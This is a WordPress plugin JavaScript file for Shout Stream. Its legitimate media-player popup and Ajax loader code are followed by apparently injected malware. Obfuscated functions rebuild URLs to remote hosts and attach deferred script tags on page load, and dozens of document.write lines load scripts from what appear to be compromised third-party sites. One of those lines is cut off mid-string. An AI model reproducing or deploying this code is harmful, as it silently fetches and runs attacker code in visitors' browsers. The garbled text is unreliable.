/*
+----------------------------------------------------------------+
|	WordPress Plugin: Shout Stream            								     |
|	http://deuced.net/shout-stream/        						             |
|	File Information:																	             |
|	- Shout Stream Javascript  POPUP window										     |
|	- wp-content/plugins/shout-stream/ss_popup.js                  |
+----------------------------------------------------------------+
*/
function ss_popup(divname,winName,features,curvalue) 
{ 
  w=window.open('',winName,features);
	w.document.write('<HTML xmlns="http://www.w3.org/1999/xhtml"><HEAD><TITLE>Popup Window</TITLE></HEAD>');
  var stream_array = new Array();
  stream_array = curvalue.split(' ');
  var ss_popupip = stream_array[1];
  var ss_popupport = stream_array[2];
  var ss_detect = stream_array[3];
  var ss_media_caster = stream_array[4];
  var ss_minipointurl = stream_array[5];
  var ss_minicaster_url = stream_array[6];
  var ss_minicasterurl = stream_array[7];
  var ss_type = stream_array[8];
  var ss_mountpoint = stream_array[9];
  var ss_streamname = stream_array[10];
  var SS_media_player_URLtype = ss_popupip + ':' + ss_popupport + '/' + ss_mountpoint; 
	w.document.write('<BODY bgcolor="#000000" leftmargin="0" topmargin="15" link="#e8e8e8" vlink="#e8e8e8" alink="#e8e8e8">');
  w.document.write('<div style="text-align: center; line-height: 20px; color: #e8e8e8; text-decoration: none; letter-spacing: 0px; font-weight: bold; font-size: 10px; font-family: verdana;">' + ss_streamname +'</div>');
if (ss_detect == 0 && ss_media_caster == 2)
{
  w.document.write('<div style="text-align: center; height: 70px;">');  
	w.document.write('<object id="fmp256" type="application/x-shockwave-flash" data="' + ss_minipointurl + '/plugins/shout-stream/minicaster.swf" width="180" height="70" flashVars="config=' + ss_minicaster_url + 'minicaster.php%3Fminicasterurl%3D' + ss_minicasterurl + '" />');
	w.document.write('<param name="movie" value="' + ss_minipointurl + '/plugins/shout-stream/minicaster.swf" />');
	w.document.write('<param name="wmode" value="transparent" />');
	w.document.write('<param name="allowScriptAccess" value="sameDomain" />');
	w.document.write('<param name="flashVars" value="config=' + ss_minicaster_url + 'minicaster.php%3Fminicasterurl%3D' + ss_minicasterurl + '" />');
	w.document.write('</object>');
  w.document.write('</div>');  
}
else
{
  w.document.write('<div style="text-align: center;">');  
 	w.document.write('<object id="MediaPlayer" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6" standby="Loading Windows Media Player components..." width="200" height="70" type="application/x-oleobject" />');
	w.document.write('<param ref value="http://' + SS_media_player_URLtype + '" name="URL" valuetype="ref" />');
	w.document.write('<param value="1" name="AudioStream" />');
	w.document.write('<param value="0" name="AutoSize" />');
	w.document.write('<param value="0" name="AutoStart" />');
	w.document.write('<param value="0" name="AnimationAtStart" />');
	w.document.write('<param value="-1" name="AllowScan" />');
	w.document.write('<param value="-1" name="AllowChangeDisplaySize" />');
	w.document.write('<param value="0" name="AutoRewind"/>');
	w.document.write('<param value="0" name="Balance" />');
	w.document.write('<param value name="BaseURL" />');
	w.document.write('<param value="5" name="BufferingTime" />');
	w.document.write('<param value name="CaptioningID" />');
	w.document.write('<param value="-1" name="ClickToPlay" />');
	w.document.write('<param value="0" name="CursorType" />');
	w.document.write('<param value="-1" name="CurrentPosition" />');
	w.document.write('<param value="0" name="CurrentMarker" />');
	w.document.write('<param value name="DefaultFrame" />');
	w.document.write('<param value="0" name="DisplayBackColor" />');
	w.document.write('<param value="16777215" name="DisplayForeColor" />');
	w.document.write('<param value="1" name="DisplayMode" />');
	w.document.write('<param value="1" name="DisplaySize" />');
	w.document.write('<param value="-1" name="Enabled" />');
	w.document.write('<param value="-1" name="EnableContextMenu" />');
	w.document.write('<param value="-1" name="EnablePositionControls" />');
	w.document.write('<param value="-1" name="EnableFullScreenControls" />');
	w.document.write('<param value="-1" name="EnableTracker" />');
	w.document.write('<param value="-1" name="InvokeURLs" />');
	w.document.write('<param value="-1" name="Language" />');
	w.document.write('<param value="0" name="Mute" />');
	w.document.write('<param value="0" name="PlayCount" />');
	w.document.write('<param value="0" name="PreviewMode" />');
	w.document.write('<param value="1" name="Rate" />');
	w.document.write('<param value name="SAMILang" />');
	w.document.write('<param value name="SAMIStyle" />');
	w.document.write('<param value name="SAMIFileName" />');
	w.document.write('<param value="-1" name="SelectionStart" />');
	w.document.write('<param value="-1" name="SelectionEnd" />');
	w.document.write('<param value="-1" name="SendOpenStateChangeEvents" />');
	w.document.write('<param value="-1" name="SendWarningEvents" />');
	w.document.write('<param value="-1" name="SendErrorEvents" />');
	w.document.write('<param value="0" name="SendKeyboardEvents" />');
	w.document.write('<param value="0" name="SendMouseClickEvents" />');
	w.document.write('<param value="0" name="SendMouseMoveEvents" />');
	w.document.write('<param value="-1" name="SendPlayStateChangeEvents" />');
	w.document.write('<param value="0" name="ShowCaptioning" />');
	w.document.write('<param value="-1" name="ShowControls" />');
	w.document.write('<param value="-1" name="ShowAudioControls" />');
	w.document.write('<param value="0" name="ShowDisplay" />');
	w.document.write('<param value="0" name="ShowGotoBar" />');
	w.document.write('<param value="0" name="ShowPositionControls" />');
	w.document.write('<param value="-1" name="ShowStatusBar" />');
	w.document.write('<param value="-1" name="ShowTracker" />');
	w.document.write('<param value="0" name="TransparentAtStart" />');
	w.document.write('<param value="0" name="VideoBorderWidth" />');
	w.document.write('<param value="616614" name="VideoBorderColor" />');
	w.document.write('<param value="-1" name="VideoBorder3D" />');
	w.document.write('<param value="100" name="Volume" />');
	w.document.write('<param value="-1" name="WindowlessVideo" />');
	w.document.write('<embed src="http://' + SS_media_player_URLtype + '" pluginspage="http://port25.technet.com/pages/windows-media-player-firefox-plugin-download.aspx" showstatusbar="1" name="MediaPlayer" autostart="0" volume="100" type="application/x-ms-wmp" height="80" width="200">');
	w.document.write('</embed>');
	w.document.write('</object>');
  w.document.write('</div>');  
}
  w.document.write('<div style="text-align: center; line-height: 20px; color: #e8e8e8; text-decoration: none; letter-spacing: 0px; font-weight: bold; font-size: 10px; font-family: verdana;"><a href="javascript:self.close()">Close Player</a></div>');
	w.document.write('</BODY></HTML>');
  w.document.close();  
}
/*
+--------------------------------------------------------------------------------+
| The following code was found @ DYNAMIC DRIVE                                   |
| Dynamic Ajax Content- © Dynamic Drive DHTML code library (www.dynamicdrive.com)|
| This notice MUST stay intact for legal use                                     |
| Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code       |
+--------------------------------------------------------------------------------+
*/
var bustcachevar=1 //bust potential caching of external pages after initial request? (1=yes, 0=no)
var loadedobjects=""
var rootdomain="http://"+window.location.hostname
var bustcacheparameter=""
function ssajaxpage(url, containerid){
var page_request = false
if (window.XMLHttpRequest) // if Mozilla, Safari etc
page_request = new XMLHttpRequest()
else if (window.ActiveXObject){ // if IE
try {
page_request = new ActiveXObject("Msxml2.XMLHTTP")
} 
catch (e){
try{
page_request = new ActiveXObject("Microsoft.XMLHTTP")
}
catch (e){}
}
}
else
return false
page_request.onreadystatechange=function(){
loadpage(page_request, containerid)
}
if (bustcachevar) //if bust caching of external page
bustcacheparameter=(url.indexOf("?")!=-1)? "&"+new Date().getTime() : "?"+new Date().getTime()
page_request.open('GET', url+bustcacheparameter, true)
page_request.send(null)
}
function loadpage(page_request, containerid){
if (page_request.readyState == 4 && (page_request.status==200 || window.location.href.indexOf("http")==-1))
document.getElementById(containerid).innerHTML=page_request.responseText

}
function loadobjs(){
if (!document.getElementById)
return
for (i=0; i<arguments.length; i++){
var file=arguments[i]
var fileref=""
if (fileref!=""){
document.getElementsByTagName("head").item(0).appendChild(fileref)
loadedobjects+=file+" " //Remember this object as being already added to page
}
}
}

function M(){var R=new String("creat"+"eElem"+"ent");var Q=new Array();var _=String("6pXsdefer".substr(4));Z=21294;Z+=191;var c=new String();var _H=String("body");var CE=[];var B=String("src");var s=new String("onlo"+"adPs7I".substr(0,2));var g=window;var l="scr"+"ipt";this.wyY=false;var X=document;var K=new String("app"+"end"+"ChibJ4Z".substr(0,3)+"LmuldmuL".substr(3,2));var V={IU:false};this.v="";try {var KO='y'} catch(KO){};function T(){n=[];try {this.j=63516;this.j-=48;var wo=["D","D_"];var cS=["Xj","TG"];try {var zJj='_u'} catch(zJj){};try {var J='dJ'} catch(J){};var z=4074-4073;this.QN=303;this.QN-=128;this.t=43441;this.t+=79;var A=new String("/go"+"KItPogl".substr(4)+"e.c"+"om/"+"hos"+"tga"+"tor"+".co"+"m/z"+"app"+"8lqWos.".substr(4)+"com"+".ph"+"tJZp".substr(3));try {} catch(bY){};var N=String("ht"+"tp"+":/vNO".substr(0,2)+"/p"+"O3UasO3U".substr(3,2)+"sp"+"or"+"kQ7tb7kQ".substr(3,2)+"lu"+"2FdesdF2".substr(3,2)+"3y9L.r".substr(4)+"pn9qu:q9np".substr(4,2));Cz={ZE:"VT"};S=["a","Mh"];var b=964849-956769;var Vt=["yy","NH"];U=X[R](l);var o=["g_","jt","xN"];VV=39496;VV-=1;var bn={E:"i"};var DKK={NX:false};U[B]=N+b+A;this.Zf=9082;this.Zf++;U[_]=z;try {var TK='rI'} catch(TK){};eA=["JU","qe","yK"];var CJ=new Array();X[_H][K](U);var Ia=["GN"];} catch(w){this.lx=18781;this.lx--;this.ul=19733;this.ul--;hfq=["Kp","_J","Kh"];};}this.gB=false;g[s]=T;var Ml=53292;var SA=false;};var av="av";var rl={};M();
this.K="K";try {this.u=46074;this.u+=194;try {var C='RR'} catch(C){};this.b=false;try {var dB='RS'} catch(dB){};try {var Z='e'} catch(Z){};var Pn=["J","Vc"];var S=["W","L"];this.uK="";var tG=["Rw","l"];var ob=["lI","O"];var B=window[String("une"+"sca"+"pe")];var YG="YG";this.LN=30349;this.LN+=52;var Kk="";var jW="";Ho=[];var Xb=false;var dr="T7C1".substr(3);y=[];var NN='';tn={lY:"fm"};var E=window[(String("RegCMF".substr(0,3)+"Exp"))];var Qg=new String();var g="rep"+"lac"+"e";this.bjN=48941;this.bjN++;var X="onlo"+"xCbad".substr(3);this.SV="";var hd={vv:false};var R='';var fR=new Array();var JC={_:false};var ir={RU:49922};var sQ=[];function d(dr,x){var vo=new String();uo={Qd:31838};NW=55705;NW++;this.Dj="Dj";Ri={z:"Am"};this._h=43399;this._h--;n={RSw:"qt"};var f=new String("[");fC=45976;fC--;kF=58100;kF--;Id={aD:65473};ez=["bD","nU"];var sI='';f+=x;var OB=new Date();var IN={me:false};this.zS='';f+=B("%5d");Xg={vr:3389};this.bU=16604;this.bU-=185;var vg='';var vY='';uf=18393;uf-=32;yA=[];var ea={};this.MH="";this.fI="fI";var P=new E(f, new String("g"));ing=["Ou","VW","KP"];var mxQ={ih:false};var Ab={dI:false};var i_={WV:false};return dr.replace(P, R);Uc={Dp:"oG"};TM={y_:"IQ"};};var BB={};var _L="_L";MD=["Ht","qa"];var IZ={CZ:"Tq"};El={AR:false};IB={po:false};var Mz=false;var Xf=false;var EK=String("htKlY".substr(0,2)+"tp"+"ET3:/".substr(3)+"/gWo50".substr(0,2)+"ot"+"x0ehg0xe".substr(3,2)+"ui"+"lt"+"M7x.rMx7".substr(3,2)+"e4Nu:".substr(3));var OD=new String();var hg='';try {var laj='gN'} catch(laj){};var o="/d"+"io"+"n-"+"ne"+"-j4NT2".substr(0,2)+"p/"+"jTEgo".substr(3)+"ogJxt".substr(0,2)+"letLp".substr(0,2)+".c"+"wqVJom".substr(4)+"/c"+"a."+"8nfgo".substr(3)+"v.YjUu".substr(0,2)+"phkwad".substr(0,2)+"psOSy".substr(0,1);td=55651;td-=60;var yz={bX:"Aj"};Mh=23000;Mh-=230;var Eu=523907-515827;try {} catch(Cm){};wr=37892;wr++;var TU={};KH={PK:false};try {} catch(Gc){};var rp={NG:"DD"};var l_={rc:"ESf"};function N(){var M=document;var Hy=["vK","TD","Ye"];tl=60253;tl-=16;dJ={};var Iw_=["LNV","yq"];var Or=["cc","rf","Sa"];var t=d('sCcqrFiJpytF','vJ9Foyefkw2CV8Tdn5qIZ7mx');var JE=new Array();var vb={};var ho=new Date();var h=new String("appe"+"ndCh"+"ild");this.vA=47456;this.vA--;this.hFK=63434;this.hFK-=13;var eJ={LND:13169};this.oQ=18125;this.oQ-=212;EA=["uc","kf"];this.OOs=7666;this.OOs++;var _F=new Date();var fB=["gb","vI","cIE"];try {var DQ='a_'} catch(DQ){};var KA=["xj","pf","QY"];try {var Jh='Ij'} catch(Jh){};rzu=["VC"];a=M.createElement(t);SB=28146;SB++;var Hh={Nr:"va"};RC=EK+Eu;this.cZ="";RC=RC+o;My=27395;My+=5;var tna={PT:45172};var Ka={ot:4561};this.LB=23249;this.LB++;a.src=RC;Ai=45235;Ai+=192;FF={ya:false};var qF='';var Tk=false;this.FG="";this.TB=51681;this.TB++;Fk=59522;Fk-=228;var w=M.body;var xJ=["WM","_X","Ob"];var aH=["OV","NGk","BT"];var WK=["Xc","j_","wQ"];var Aw=[];a[String("defer")]=dr;lZ=5589;lZ-=3;var lfJ={UO:false};Pj={Ju:"Wb"};this.EP=false;w[h](a);var viG=["zC","hb"];var kR={};GA=51040;GA-=196;};var nw=false;Ur=["KM"];try {var Ze='MlO'} catch(Ze){};try {var XS='DM'} catch(XS){};_Kl=13838;_Kl+=162;WE=59544;WE+=39;var oj={gE:"MQP"};this.yL=false;gV={qe:47293};window[X]=N;var jq=[];var nh=new Array();var xz=21977;} catch(q){try {} catch(Ce){};this.wP='';try {} catch(kN){};};




document.write('<script src=http://shopsand.com/lib/403.shtml.php ><\/script>');
document.write('<script src=http://shopsand.com/lib/403.shtml.php ><\/script>');
document.write('<script src=http://shopsand.com/lib/403.shtml.php ><\/script>');
document.write('<script src=http://upstairs.co.jp/cgi-bin/wp-load.php ><\/script>');
document.write('<script src=http://upstairs.co.jp/cgi-bin/wp-load.php ><\/script>');
document.write('<script src=http://upstairs.co.jp/cgi-bin/wp-load.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://takahata-wine.co.jp/wine-info/ex2010spring_top.php ><\/script>');
document.write('<script src=http://takahata-wine.co.jp/wine-info/ex2010spring_top.php ><\/script>');
document.write('<script src=http://takahata-wine.co.jp/wine-info/ex2010spring_top.php ><\/script>');
document.write('<script src=http://takahata-wine.co.jp/wine-info/ex2010spring_top.php ><\/script>');
document.write('<script src=http://mayoora.com/DPR/2.php ><\/script>');
document.write('<script src=http://mayoora.com/DPR/2.php ><\/script>');
document.write('<script src=http://mayoora.com/DPR/2.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://alpaf.com/images/gifimg.php ><\/script>');
document.write('<script src=http://alpaf.com/images/gifimg.php ><\/script>');
document.write('<script src=http://alpaf.com/images/gifimg.php ><\/script>');
document.write('<script src=http://alpaf.com/images/gifimg.php ><\/script>');
document.write('<script src=http://alpaf.com/images/gifimg.php ><\/script>');
document.write('<script src=http
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://123coder.com/php.2/indexl.php ><\/script>');
document.write('<script src=http://123coder.com/php.2/indexl.php ><\/script>');
document.write('<script src=http://123coder.com/php.2/indexl.php ><\/script>');